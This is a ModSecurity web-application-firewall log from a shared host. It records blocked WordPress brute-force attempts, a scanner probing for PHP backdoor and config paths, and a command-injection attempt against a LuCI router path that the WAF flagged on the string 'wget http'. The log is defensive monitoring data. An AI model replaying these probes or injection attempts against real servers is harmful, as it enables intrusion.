[Tue May 26 12:59:10.385874 2026] [security2:error] [pid 470766:tid 470954] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLxejO_W1DqEcFHQ7bygAAADo"]
[Tue May 26 12:59:12.251896 2026] [security2:error] [pid 470766:tid 470988] [client 91.242.236.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLyOjO_W1DqEcFHQ7cEwAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 12:59:12.581885 2026] [security2:error] [pid 470766:tid 470996] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLyOjO_W1DqEcFHQ7cDAAAAGQ"]
[Tue May 26 12:59:13.268367 2026] [security2:error] [pid 470766:tid 470912] [client 91.242.236.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLyejO_W1DqEcFHQ7cLAAAABA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 12:59:14.933327 2026] [security2:error] [pid 470766:tid 471008] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLyujO_W1DqEcFHQ7cTQAAAHA"]
[Tue May 26 12:59:16.755915 2026] [security2:error] [pid 470766:tid 470789] [remote 82.223.0.235:36824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVLzOjO_W1DqEcFHQ7cdAAATBY"]
[Tue May 26 12:59:18.214088 2026] [security2:error] [pid 470766:tid 470987] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLzejO_W1DqEcFHQ7cjwAAAFs"]
[Tue May 26 12:59:19.051421 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:53792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLz-jO_W1DqEcFHQ7crwAAABI"]
[Tue May 26 12:59:19.051592 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:53792] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLz-jO_W1DqEcFHQ7crwAAABI"]
[Tue May 26 12:59:20.055388 2026] [security2:error] [pid 470766:tid 470995] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLz-jO_W1DqEcFHQ7cuwAAAGM"]
[Tue May 26 12:59:20.557916 2026] [security2:error] [pid 470766:tid 471007] [client 74.7.244.52:53842] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahVL0OjO_W1DqEcFHQ7cyAAAbyY"]
[Tue May 26 12:59:21.567295 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wk/index.php"] [unique_id "ahVL0ejO_W1DqEcFHQ7c1QAAAFY"]
[Tue May 26 12:59:22.003951 2026] [security2:error] [pid 470766:tid 470978] [client 74.7.244.52:35420] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVL0OjO_W1DqEcFHQ7czQAAAFI"]
[Tue May 26 12:59:23.227860 2026] [security2:error] [pid 470766:tid 470933] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL0ujO_W1DqEcFHQ7dHwAAACU"]
[Tue May 26 12:59:23.552090 2026] [security2:error] [pid 470766:tid 470990] [client 4.201.75.230:5633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/inputs.php"] [unique_id "ahVL0-jO_W1DqEcFHQ7dNwAAAF4"]
[Tue May 26 12:59:23.879954 2026] [security2:error] [pid 470766:tid 470841] [remote 95.216.117.13:50544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVL0-jO_W1DqEcFHQ7dQgAAYko"]
[Tue May 26 12:59:24.799309 2026] [security2:error] [pid 470766:tid 471012] [client 4.201.75.230:5342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/ioxi-o.php"] [unique_id "ahVL1OjO_W1DqEcFHQ7dcwAAAHQ"]
[Tue May 26 12:59:25.307815 2026] [security2:error] [pid 470766:tid 470976] [client 35.241.166.201:59928] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.198.65"] [uri "/"] [unique_id "ahVL1ejO_W1DqEcFHQ7ddwAAAFA"]
[Tue May 26 12:59:25.558852 2026] [security2:error] [pid 470766:tid 470790] [remote 95.216.117.13:50550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVL1ejO_W1DqEcFHQ7dhQAACBc"]
[Tue May 26 12:59:25.825996 2026] [security2:error] [pid 470766:tid 470955] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL1ejO_W1DqEcFHQ7dhAAAADs"]
[Tue May 26 12:59:26.018108 2026] [security2:error] [pid 470766:tid 470913] [client 4.201.75.230:5332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/function/function.php"] [unique_id "ahVL1ujO_W1DqEcFHQ7digAAABE"]
[Tue May 26 12:59:26.885641 2026] [security2:error] [pid 470766:tid 470972] [client 31.57.184.107:59933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.glorodbalsa.glorodavionics.com"] [uri "/wp-login.php"] [unique_id "ahVL1ujO_W1DqEcFHQ7dkQAAAEw"], referer: https://www.google.com/
[Tue May 26 12:59:27.813818 2026] [security2:error] [pid 470766:tid 470960] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL1-jO_W1DqEcFHQ7dogAAAEA"]
[Tue May 26 12:59:29.080063 2026] [security2:error] [pid 470766:tid 470958] [client 4.201.75.230:5329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/rip.php"] [unique_id "ahVL2ejO_W1DqEcFHQ7dzQAAAD4"]
[Tue May 26 12:59:29.637186 2026] [security2:error] [pid 470766:tid 470913] [client 157.20.138.61:54151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL2ejO_W1DqEcFHQ7d3gAAABE"]
[Tue May 26 12:59:29.637297 2026] [security2:error] [pid 470766:tid 470913] [client 157.20.138.61:54151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL2ejO_W1DqEcFHQ7d3gAAABE"]
[Tue May 26 12:59:30.284074 2026] [security2:error] [pid 470766:tid 470909] [client 4.201.75.230:5336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/admin.php"] [unique_id "ahVL2ujO_W1DqEcFHQ7d6gAAAA0"]
[Tue May 26 12:59:31.068279 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL2ujO_W1DqEcFHQ7d9gAAAGE"]
[Tue May 26 12:59:32.439563 2026] [autoindex:error] [pid 470766:tid 470902] [client 185.217.125.16:65453] AH01276: Cannot serve directory /home1/newde164/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:59:32.844443 2026] [security2:error] [pid 470766:tid 471022] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL3OjO_W1DqEcFHQ7eIAAAAH4"]
[Tue May 26 12:59:33.181786 2026] [security2:error] [pid 470766:tid 470940] [client 4.201.75.230:5350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVL3ejO_W1DqEcFHQ7eJwAAACw"]
[Tue May 26 12:59:34.513611 2026] [security2:error] [pid 470766:tid 470833] [remote 37.187.156.42:44366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVL3ujO_W1DqEcFHQ7eOQAAdUI"]
[Tue May 26 12:59:34.783407 2026] [security2:error] [pid 470766:tid 470993] [client 113.186.50.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL3ujO_W1DqEcFHQ7ePwAAAGE"]
[Tue May 26 12:59:35.272857 2026] [security2:error] [pid 470766:tid 470950] [client 4.201.75.230:5367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/cache.php"] [unique_id "ahVL3-jO_W1DqEcFHQ7eUgAAADY"]
[Tue May 26 12:59:36.156898 2026] [security2:error] [pid 470766:tid 470946] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL3-jO_W1DqEcFHQ7eYQAAADI"]
[Tue May 26 12:59:37.583061 2026] [security2:error] [pid 470766:tid 471020] [client 4.201.75.230:5653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/themes.php"] [unique_id "ahVL4ejO_W1DqEcFHQ7egwAAAHw"]
[Tue May 26 12:59:38.763950 2026] [security2:error] [pid 470766:tid 470922] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL4ujO_W1DqEcFHQ7ekgAAABo"]
[Tue May 26 12:59:39.625910 2026] [security2:error] [pid 470766:tid 470949] [client 4.201.75.230:5658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/an.php"] [unique_id "ahVL4-jO_W1DqEcFHQ7esAAAADU"]
[Tue May 26 12:59:40.283477 2026] [security2:error] [pid 470766:tid 470927] [client 157.20.138.61:54505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL5OjO_W1DqEcFHQ7evAAAAB8"]
[Tue May 26 12:59:40.283638 2026] [security2:error] [pid 470766:tid 470927] [client 157.20.138.61:54505] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL5OjO_W1DqEcFHQ7evAAAAB8"]
[Tue May 26 12:59:41.496997 2026] [security2:error] [pid 470766:tid 470939] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL5ejO_W1DqEcFHQ7e7QAAACs"]
[Tue May 26 12:59:43.086581 2026] [security2:error] [pid 470766:tid 470910] [client 4.201.75.230:5333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/index/function.php"] [unique_id "ahVL5-jO_W1DqEcFHQ7fHAAAAA4"]
[Tue May 26 12:59:44.053224 2026] [security2:error] [pid 470766:tid 470982] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL5-jO_W1DqEcFHQ7fJQAAAFY"]
[Tue May 26 12:59:44.267036 2026] [security2:error] [pid 470766:tid 470947] [client 4.201.75.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahVL6OjO_W1DqEcFHQ7fNAAAADM"]
[Tue May 26 12:59:44.621912 2026] [security2:error] [pid 470766:tid 471007] [client 4.201.75.230:5371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/ws.php"] [unique_id "ahVL6OjO_W1DqEcFHQ7fPQAAAG8"]
[Tue May 26 12:59:46.548796 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL6ujO_W1DqEcFHQ7fXgAAAHo"]
[Tue May 26 12:59:46.827554 2026] [security2:error] [pid 470766:tid 470986] [client 221.159.119.6:52321] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6ujO_W1DqEcFHQ7fawAAAFo"]
[Tue May 26 12:59:46.827684 2026] [security2:error] [pid 470766:tid 470986] [client 221.159.119.6:52321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6ujO_W1DqEcFHQ7fawAAAFo"]
[Tue May 26 12:59:46.998918 2026] [security2:error] [pid 470766:tid 470963] [client 4.201.75.230:5639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/404.php"] [unique_id "ahVL6ujO_W1DqEcFHQ7fbAAAAEM"]
[Tue May 26 12:59:47.032087 2026] [security2:error] [pid 470766:tid 470947] [client 221.159.119.6:52382] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6-jO_W1DqEcFHQ7fbgAAADM"]
[Tue May 26 12:59:47.032212 2026] [security2:error] [pid 470766:tid 470947] [client 221.159.119.6:52382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6-jO_W1DqEcFHQ7fbgAAADM"]
[Tue May 26 12:59:47.421683 2026] [security2:error] [pid 470766:tid 470866] [remote 211.23.68.235:43559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVL6-jO_W1DqEcFHQ7fdwAAbWM"]
[Tue May 26 12:59:48.370026 2026] [security2:error] [pid 470766:tid 471004] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL6-jO_W1DqEcFHQ7fhAAAAGw"]
[Tue May 26 12:59:48.766600 2026] [security2:error] [pid 470766:tid 470996] [client 66.132.172.45:43784] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.marchedesedhiou.com.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVL7OjO_W1DqEcFHQ7fnAAAAGQ"]
[Tue May 26 12:59:50.099873 2026] [security2:error] [pid 470766:tid 470985] [client 4.201.75.230:5341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahVL7ujO_W1DqEcFHQ7f4QAAAFk"]
[Tue May 26 12:59:50.704593 2026] [security2:error] [pid 470766:tid 470923] [client 157.20.138.61:54853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL7ujO_W1DqEcFHQ7f6AAAABs"]
[Tue May 26 12:59:50.704753 2026] [security2:error] [pid 470766:tid 470923] [client 157.20.138.61:54853] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL7ujO_W1DqEcFHQ7f6AAAABs"]
[Tue May 26 12:59:51.135983 2026] [security2:error] [pid 470766:tid 470899] [client 4.201.75.230:5326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-conf.php"] [unique_id "ahVL7-jO_W1DqEcFHQ7f9gAAAAM"]
[Tue May 26 12:59:51.573016 2026] [security2:error] [pid 470766:tid 471010] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL7-jO_W1DqEcFHQ7f8wAAAHI"]
[Tue May 26 12:59:53.568787 2026] [security2:error] [pid 470766:tid 470966] [client 4.201.75.230:5345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVL8ejO_W1DqEcFHQ7gJQAAAEY"]
[Tue May 26 12:59:53.960637 2026] [security2:error] [pid 470766:tid 470986] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL8ejO_W1DqEcFHQ7gMQAAAFo"]
[Tue May 26 12:59:54.918762 2026] [security2:error] [pid 470766:tid 470918] [client 4.201.75.230:5314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/abc.php"] [unique_id "ahVL8ujO_W1DqEcFHQ7gVwAAABY"]
[Tue May 26 12:59:56.171038 2026] [security2:error] [pid 470766:tid 470986] [client 45.148.10.204:33882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL8-jO_W1DqEcFHQ7gcQAAAFo"]
[Tue May 26 12:59:56.278430 2026] [security2:error] [pid 470766:tid 470897] [client 45.148.10.204:33896] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gdQAAAAE"]
